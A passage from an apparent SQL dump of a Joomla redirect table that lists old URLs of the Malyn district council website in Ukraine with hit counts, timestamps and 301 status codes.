00:00:00',301),(15169,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/181-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi_2','','','',114,0,'2015-10-30 13:40:18','0000-00-00 00:00:00',301),(15170,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/181-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi_2?tmpl=component&print=1&layout=default&page=','','','',98,0,'2015-10-30 13:40:20','0000-00-00 00:00:00',301),(15171,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/473-pro-nadannja-dozvolu-na-vidchuzhennja-ob’ekta_2','','','',166,0,'2015-10-30 13:40:22','0000-00-00 00:00:00',301),(15172,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/468-pro-zatverdzhennja-rajonnoi-cilovoi-programi','','','',39,0,'2015-10-30 13:40:25','0000-00-00 00:00:00',301),(15173,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=609:-q-q&catid=11&lang=en&Itemid=','','','',2,0,'2015-10-30 13:40:38','0000-00-00 00:00:00',301),(15174,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=602:2012-03-02-08-12-58&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2015-10-30 13:40:50','0000-00-00 00:00:00',301),(15175,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=163:2010-11-15-10-28-53&catid=11:2010-06-05-14-33-33&Itemid=16&lang=en','','','',1,0,'2015-10-30 13:40:51','0000-00-00 00:00:00',301),(15176,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=164:-6-&catid=11&Itemid=16&lang=uk','','','',2,0,'2015-10-30 13:40:52','0000-00-00 00:00:00',301),(15177,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=361:2011-07-06-04-47-53&catid=11&Itemid=14&lang=uk','','','',3,0,'2015-10-30 13:40:54','0000-00-00 00:00:00',301),(15178,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=997:-27-&catid=11&lang=ru&Itemid=','','','',2,0,'2015-10-30 13:40:54','0000-00-00 00:00:00',301),(15179,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=610:2012-03-23-06-34-31&catid=11&lang=en&Itemid=','','','',4,0,'2015-10-30 13:40:57','0000-00-00 00:00:00',301),(15180,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=601:-20-&catid=11&lang=en','','','',2,0,'2015-10-30 13:40:58','0000-00-00 00:00:00',301),(15181,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1010:-22-6-&catid=11&lang=uk&Itemid=','','','',3,0,'2015-10-30 13:41:15','0000-00-00 00:00:00',301),(15182,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=153:2010-10-26-13-18-23&catid=11&lang=uk','','','',4,0,'2015-10-30 13:41:26','0000-00-00 00:00:00',301),(15183,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=831:2012-11-27-15-13-30&catid=11&lang=en&Itemid=','','','',2,0,'2015-10-30 13:41:36','0000-00-00 00:00:00',301),(15184,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/497-pro-zvernennja-do-korostenskoi-direkcii','','','',24,0,'2015-10-30 13:41:37','0000-00-00 00:00:00',301),(15185,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/981-pro-zatverdzhennya-programi-rozvitku-malogo-i-serednogo-pidpriemnitstva-malinskogo-rajonu-na-2015-2016-roki','','','',5,0,'2015-10-30 13:41:44','0000-00-00 00:00:00',301),(15186,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=847:-17-6-&catid=11&lang=uk','','','',1,0,'2015-10-30 13:41:45','0000-00-00 00:00:00',301),(15187,'http://www.malyn-rayrada.org.ua/attachments/004_history malyn region1.PDF','','','',43,0,'2015-10-30 13:41:50','0000-00-00 00:00:00',301),(15188,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=601:-20-&catid=11&lang=uk&Itemid=','','','',3,0,'2015-10-30 13:42:04','0000-00-00 00:00:00',301),(15189,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=57&Itemid=98&lang=ru&limitstart=15','','','',3,0,'2015-10-30 13:42:26','0000-00-00 00:00:00',301),(15190,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/571-pro-deputatskij-zapit-deputata-rajonnoi-radi_2','','','',14,0,'2015-10-30 13:44:58','0000-00-00 00:00:00',301),(15191,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/93-pro-zatverdzhennja-cilovoi-rajonnoi-programi','','https://www.google.com.ua/','',51,0,'2015-10-30 13:55:31','0000-00-00 00:00:00',301),(15192,'http://www.malyn-rayrada.org.ua/index.php?id=43&Itemid=82&lang=en&layout=blog&option=com_content&view=category','','','',2,0,'2015-10-30 14:00:16','0000-00-00 00:00:00',301),(15193,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/345-pro-zatverdzhennja-porjadku-pogodzhennja','','','',36,0,'2015-10-30 14:01:04','0000-00-00 00:00:00',301),(15194,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-?limitstart=0','','','',8,0,'2015-10-30 14:01:05','0000-00-00 00:00:00',301),(15195,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014','','','',38,0,'2015-10-30 14:01:27','0000-00-00 00:00:00',301),(15196,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/194-pro-nadannja-pilgi-z-orendnoi-plati-viddilu?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-30 14:04:18','0000-00-00 00:00:00',301),(15197,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/195-pro-zatverdzhennja-tehnichnoi-dokumentacii-z','','','',6,0,'2015-10-30 14:04:20','0000-00-00 00:00:00',301),(15198,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/104-pro-utvorennja-frakcij?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-30 14:04:22','0000-00-00 00:00:00',301),(15199,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/105-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2010','','','',5,0,'2015-10-30 14:04:23','0000-00-00 00:00:00',301),(15200,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/99-pro-utvorennja-prezidii-rajonnoi-radi','','','',8,0,'2015-10-30 14:04:25','0000-00-00 00:00:00',301),(15201,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30122010-/171-pro-programu-socialno-ekonomichnogo-rozvitku','','','',10,0,'2015-10-30 14:04:27','0000-00-00 00:00:00',301),(15202,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30122010-/72-pro-rajonnij-bjudzhet-na-2011-rik?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-10-30 14:04:29','0000-00-00 00:00:00',301),(15203,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30122010-/84-rishennja-prijnjati-na-3-sesii-rajonnoi-radi-6','','','',11,0,'2015-10-30 14:04:30','0000-00-00 00:00:00',301),(15204,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-02-2015-roku/1021-pro-zatverdzhennya-programi-sotsialnoji-pidtrimki-vnutrishno-peremishchenikh-osib','','','',9,0,'2015-10-30 14:04:32','0000-00-00 00:00:00',301),(15205,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-02-2015-roku/1022-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-10-30 14:04:33','0000-00-00 00:00:00',301),(15206,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/936-pro-nadannya-dozvolu-na-vidchuzhennya-ob-ektiv-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',8,0,'2015-10-30 14:04:35','0000-00-00 00:00:00',301),(15207,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/937-pro-zatverdzhennya-pereliku-ob-ektiv-shcho-pidlyagayut-privatizatsiji-u-2014-2015-rokakh','','','',8,0,'2015-10-30 14:04:36','0000-00-00 00:00:00',301),(15208,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/938-pro-nadannya-dozvolu-komunalnij-ustanovi-malinskij-rajonnij-trudovij-arkhiv-na-prijnyattya-dokumentiv','','','',10,0,'2015-10-30 14:04:38','0000-00-00 00:00:00',301),(15209,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/940-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik','','','',10,0,'2015-10-30 14:04:40','0000-00-00 00:00:00',301),(15210,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1168-pro-zapit-deputata-rajonnoji-radi-sidorchuka-v-i-shchodo-nezakonnogo-budivnitstva','','','',10,0,'2015-10-30 14:04:42','0000-00-00 00:00:00',301),(15211,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1169-pro-neobkhidnist-vzyattya-na-oblik-bezkhazyajnogo-nerukhomogo-majna','','','',10,0,'2015-10-30 14:04:43','0000-00-00 00:00:00',301),(15212,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/676-pro-vnesennja-zmin-do-rajonnoi-kompleksnoi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-30 14:09:38','0000-00-00 00:00:00',301),(15213,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/473-pro-nadannja-dozvolu-na-vidchuzhennja-ob’ekta_2?tmpl=component&print=1&layout=default&page=','','','',100,0,'2015-10-30 14:10:02','0000-00-00 00:00:00',301),(15214,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/486-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi_4','','','',99,0,'2015-10-30 14:10:03','0000-00-00 00:00:00',301),(15215,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&catid=11&lang=uk&Itemid=','','','',5,0,'2015-10-30 14:13:39','0000-00-00 00:00:00',301),(15216,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=31&Itemid=62&lang=en','','','',14,0,'2015-10-30 14:15:36','0000-00-00 00:00:00',301),(15217,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=174:-9-2010-&catid=11&lang=en&Itemid=','','','',3,0,'2015-10-30 14:15:56','0000-00-00 00:00:00',301),(15218,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=246:2011-02-09-09-55-04&catid=11&lang=en&Itemid=','','','',1,0,'2015-10-30 14:16:09','0000-00-00 00:00:00',301),(15219,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=96:2010-08-12-06-09-14&catid=26:--11082010-&Itemid=54&lang=ru','','','',2,0,'2015-10-30 14:16:19','0000-00-00 00:00:00',301),(15220,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/378-pro-vstanovlennja-mezh-silskih-naselenih-punktiv','','','',12,0,'2015-10-30 14:16:30','0000-00-00 00:00:00',301),(15221,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/963-pro-stan-zakonnosti-ta-pravoporyadku-na-teritoriji-malinskogo-rajonu-za-11-misyatsiv-2014-roku','','','',5,0,'2015-10-30 14:16:46','0000-00-00 00:00:00',301),(15222,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=831:2012-11-27-15-13-30&catid=11&lang=ru&Itemid=','','','',2,0,'2015-10-30 14:17:01','0000-00-00 00:00:00',301),(15223,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=236:-192011-&catid=11&Itemid=16&lang=en','','','',5,0,'2015-10-30 14:17:11','0000-00-00 00:00:00',301),(15224,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/147-pro-zvernennja-do-prezidenta-ukraini-shhodo','','','',39,0,'2015-10-30 14:17:18','0000-00-00 00:00:00',301),(15225,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=112:2010-08-27-12-27-21&catid=11&Itemid=16&lang=ru','','','',1,0,'2015-10-30 14:17:19','0000-00-00 00:00:00',301),(15226,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=56:--03022014-&layout=blog&Itemid=97&lang=uk','','','',14,0,'2015-10-30 14:17:21','0000-00-00 00:00:00',301),(15227,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=74:2010-07-29-07-08-30&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',2,0,'2015-10-30 14:17:27','0000-00-00 00:00:00',301),(15228,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=73:2010-07-27-14-17-18&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',1,0,'2015-10-30 14:17:28','0000-00-00 00:00:00',301),(15229,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=700:-2012-2015-&catid=36&Itemid=70&lang=en','','','',2,0,'2015-10-30 14:17:30','0000-00-00 00:00:00',301),(15230,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=428:-2012-&catid=11&lang=uk&Itemid=','','','',4,0,'2015-10-30 14:17:31','0000-00-00 00:00:00',301),(15231,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=693:2012-06-06-14-15-01&catid=11&lang=en&Itemid=','','','',4,0,'2015-10-30 14:17:34','0000-00-00 00:00:00',301),(15232,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=104:-2010-&catid=26&Itemid=54&lang=uk','','','',1,0,'2015-10-30 14:17:44','0000-00-00 00:00:00',301),(15233,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=608:2012-03-15-08-40-03&catid=11&lang=ru','','','',1,0,'2015-10-30 14:18:03','0000-00-00 00:00:00',301),(15234,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=uk&limitstart=20','','','',5,0,'2015-10-30 14:18:05','0000-00-00 00:00:00',301),(15235,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=774:2012-10-02-09-30-45&catid=45&Itemid=84&lang=ru','','','',2,0,'2015-10-30 14:18:09','0000-00-00 00:00:00',301),(15236,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=107:2010-08-19-05-19-40&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',2,0,'2015-10-30 14:18:15','0000-00-00 00:00:00',301),(15237,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=158:2010-11-08-08-49-05&catid=11&Itemid=16&lang=en','','','',3,0,'2015-10-30 14:18:16','0000-00-00 00:00:00',301),(15238,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=768:2012-10-01-13-04-03&catid=11&lang=ru','','','',1,0,'2015-10-30 14:18:17','0000-00-00 00:00:00',301),(15239,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=610:2012-03-23-06-34-31&catid=11&lang=uk','','','',8,0,'2015-10-30 14:19:05','0000-00-00 00:00:00',301),(15240,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=53&Itemid=94&lang=ru','','','',16,0,'2015-10-30 14:19:57','0000-00-00 00:00:00',301),(15241,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=468:-15-2011-120-l-r&catid=38&Itemid=73&lang=uk','','','',2,0,'2015-10-30 14:23:52','0000-00-00 00:00:00',301),(15242,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=en','','','',14,0,'2015-10-30 14:27:50','0000-00-00 00:00:00',301),(15243,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=138:2010-10-12-13-10-21&catid=11&Itemid=16&lang=ru','','','',7,0,'2015-10-30 14:28:12','0000-00-00 00:00:00',301),(15244,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=93:-----------2007-2010-&catid=26:--11082010-&Itemid=54&lang=ru','','','',2,0,'2015-10-30 14:28:21','0000-00-00 00:00:00',301),(15245,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/733-pro-peredachu-primishhennja-budo-vorob’ivskoi-zosh','','','',118,0,'2015-10-30 14:31:31','0000-00-00 00:00:00',301),(15246,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/805-pro-nadannja-statusu-ob’ekta-spilnogo','','','',114,0,'2015-10-30 14:31:37','0000-00-00 00:00:00',301),(15247,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/805-pro-nadannja-statusu-ob’ekta-spilnogo?tmpl=component&print=1&layout=default&page=','','','',114,0,'2015-10-30 14:31:40','0000-00-00 00:00:00',301),(15248,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/823-pro-pripinennja-kontraktu-z-kerivnikom-kp?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-30 14:31:49','0000-00-00 00:00:00',301),(15249,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/25-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi','','','',115,0,'2015-10-30 14:31:56','0000-00-00 00:00:00',301),(15250,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/25-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi?tmpl=component&print=1&layout=default&page=','','','',114,0,'2015-10-30 14:32:01','0000-00-00 00:00:00',301),(15251,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/630-pro-orendu-ob’ekta-spilnoi-vlasnosti-teritorialnih','','','',108,0,'2015-10-30 14:32:06','0000-00-00 00:00:00',301),(15252,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1140-starovorob-jivska-silska-rada-informue','','','',20,0,'2015-10-30 14:32:10','0000-00-00 00:00:00',301),(15253,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/630-pro-orendu-ob’ekta-spilnoi-vlasnosti-teritorialnih?tmpl=component&print=1&layout=default&page=','','','',107,0,'2015-10-30 14:32:14','0000-00-00 00:00:00',301),(15254,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/631-pro-peredachu-ob’ektiv-spilnoi-vlasnosti','','','',108,0,'2015-10-30 14:32:17','0000-00-00 00:00:00',301),(15255,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/631-pro-peredachu-ob’ektiv-spilnoi-vlasnosti?tmpl=component&print=1&layout=default&page=','','','',108,0,'2015-10-30 14:32:19','0000-00-00 00:00:00',301),(15256,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-/688-pro-zminu-nazvi-novovorob’ivskogo-zagalnoosvitnogo','','','',101,0,'2015-10-30 14:32:24','0000-00-00 00:00:00',301),(15257,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/65-pro-vstanovlennja-nadbavki?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-30 14:32:29','0000-00-00 00:00:00',301),(15258,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/768-pro-peredachu-avtobusa?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-30 14:48:33','0000-00-00 00:00:00',301),(15259,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/314-pro-inicijuvannja-peredachi-u-spilnu-vlasnist?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-30 14:48:34','0000-00-00 00:00:00',301),(15260,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/824-pro-stan-nadannja-medichnoi-dopomogi-zhiteljam?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-30 14:48:36','0000-00-00 00:00:00',301),(15261,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/445-pro-vnesennja-zmin-do-shtatnogo-rozpisu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-30 14:48:37','0000-00-00 00:00:00',301),(15262,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/446-pro-zatverdzhennja-dogovoru-pro-nadannja-subvencii_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-30 14:48:39','0000-00-00 00:00:00',301),(15263,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/152-pro-peredachu-neruhomogo-majna?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-30 14:48:40','0000-00-00 00:00:00',301),(15264,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/299-pro-nadannja-dozvolu-teritorialnomu-centru_2','','','',8,0,'2015-10-30 14:48:42','0000-00-00 00:00:00',301),(15265,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/342-pro-zatverdzhennja-polozhennja-pro-teritorialnij?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-30 14:48:43','0000-00-00 00:00:00',301),(15266,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/491-pro-zatverdzhennja-polozhennja-pro-vidznaku-90?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-30 14:48:45','0000-00-00 00:00:00',301),(15267,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/64-pro-obrannja-zastupnika-golovi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-30 14:48:46','0000-00-00 00:00:00',301),(15268,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/74-pro-prisvoennja-golovi-rajonnoi-radi-rangu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-30 14:48:48','0000-00-00 00:00:00',301),(15269,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=636:-2011-2015-&catid=42&Itemid=80&lang=uk','','','',3,0,'2015-10-30 14:59:42','0000-00-00 00:00:00',301),(15270,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=41&Itemid=78&lang=ru','','','',15,0,'2015-10-30 14:59:43','0000-00-00 00:00:00',301),(15271,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=en&limitstart=25','','','',4,0,'2015-10-30 14:59:50','0000-00-00 00:00:00',301),(15272,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=634:-2016-&catid=42&Itemid=80&lang=ru','','','',3,0,'2015-10-30 15:00:03','0000-00-00 00:00:00',301),(15273,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-?start=7','','','',15,0,'2015-10-30 15:00:27','0000-00-00 00:00:00',301),(15274,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=en&limitstart=10','','','',3,0,'2015-10-30 15:00:39','0000-00-00 00:00:00',301),(15275,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=207:2010-12-15-14-22-39&catid=29&Itemid=60&lang=uk','','','',5,0,'2015-10-30 15:00:44','0000-00-00 00:00:00',301),(15276,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=uk','','','',45,0,'2015-10-30 15:00:52','0000-00-00 00:00:00',301),(15277,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=795:-20-2011-108-l-r-&catid=45:--14112012-&Itemid=84&lang=uk','','','',6,0,'2015-10-30 15:01:03','0000-00-00 00:00:00',301),(15278,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1151-morozivska-silska-rada-informue','','','',32,0,'2015-10-30 15:01:07','0000-00-00 00:00:00',301),(15279,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=600:2012-03-01-06-12-24&catid=11&lang=uk','','','',2,0,'2015-10-30 15:01:23','0000-00-00 00:00:00',301),(15280,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=108:2010-08-20-06-08-34&catid=11&Itemid=16&lang=uk','','','',1,0,'2015-10-30 15:01:25','0000-00-00 00:00:00',301),(15281,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=602:2012-03-02-08-12-58&catid=11&lang=ru','','','',2,0,'2015-10-30 15:01:27','0000-00-00 00:00:00',301),(15282,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=116:-2010-16-2009-&catid=11&lang=uk','','','',1,0,'2015-10-30 15:01:38','0000-00-00 00:00:00',301),(15283,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=236:-192011-&catid=11:2010-06-05-14-33-33&Itemid=16&lang=en','','','',2,0,'2015-10-30 15:01:43','0000-00-00 00:00:00',301),(15284,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=601:-20-&catid=11&lang=uk','','','',2,0,'2015-10-30 15:01:45','0000-00-00 00:00:00',301),(15285,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=831:2012-11-27-15-13-30&catid=11&lang=en','','','',2,0,'2015-10-30 15:02:01','0000-00-00 00:00:00',301),(15286,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=689:2012-05-29-17-48-13&catid=11&Itemid=14&lang=uk','','','',2,0,'2015-10-30 15:02:02','0000-00-00 00:00:00',301),(15287,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=665:-75-&catid=11&lang=ru&Itemid=','','','',4,0,'2015-10-30 15:02:13','0000-00-00 00:00:00',301),(15288,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=693:2012-06-06-14-15-01&catid=11&lang=ru','','','',3,0,'2015-10-30 15:02:22','0000-00-00 00:00:00',301),(15289,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=108:2010-08-20-06-08-34&catid=11:2010-06-05-14-33-33&Itemid=16&lang=en','','','',1,0,'2015-10-30 15:02:23','0000-00-00 00:00:00',301),(15290,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=609:-q-q&catid=11&lang=en','','','',3,0,'2015-10-30 15:02:34','0000-00-00 00:00:00',301),(15291,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=74:2010-07-29-07-08-30&catid=11&Itemid=16&lang=uk','','','',2,0,'2015-10-30 15:02:40','0000-00-00 00:00:00',301),(15292,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=124:2010-09-10-18-13-17&catid=11&Itemid=16&lang=en','','','',2,0,'2015-10-30 15:02:41','0000-00-00 00:00:00',301),(15293,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=608:2012-03-15-08-40-03&catid=11&lang=uk&Itemid=','','','',3,0,'2015-10-30 15:02:42','0000-00-00 00:00:00',301),(15294,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=158:2010-11-08-08-49-05&catid=11&Itemid=16&lang=ru','','','',4,0,'2015-10-30 15:02:54','0000-00-00 00:00:00',301),(15295,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1010:-22-6-&catid=11&lang=ru','','','',1,0,'2015-10-30 15:03:20','0000-00-00 00:00:00',301),(15296,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=515:2011-12-22-10-09-17&catid=38:--19122011-&Itemid=73&lang=en','','','',2,0,'2015-10-30 15:03:27','0000-00-00 00:00:00',301),(15297,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=74:2010-07-29-07-08-30&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',3,0,'2015-10-30 15:03:29','0000-00-00 00:00:00',301),(15298,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=213:-2011-&catid=11&lang=uk','','','',1,0,'2015-10-30 15:03:34','0000-00-00 00:00:00',301),(15299,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=382:2011-07-22-08-44-54&catid=11&lang=en&Itemid=','','','',1,0,'2015-10-30 15:03:42','0000-00-00 00:00:00',301),(15300,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/445-pro-vnesennja-zmin-do-shtatnogo-rozpisu','','','',19,0,'2015-10-30 15:03:43','0000-00-00 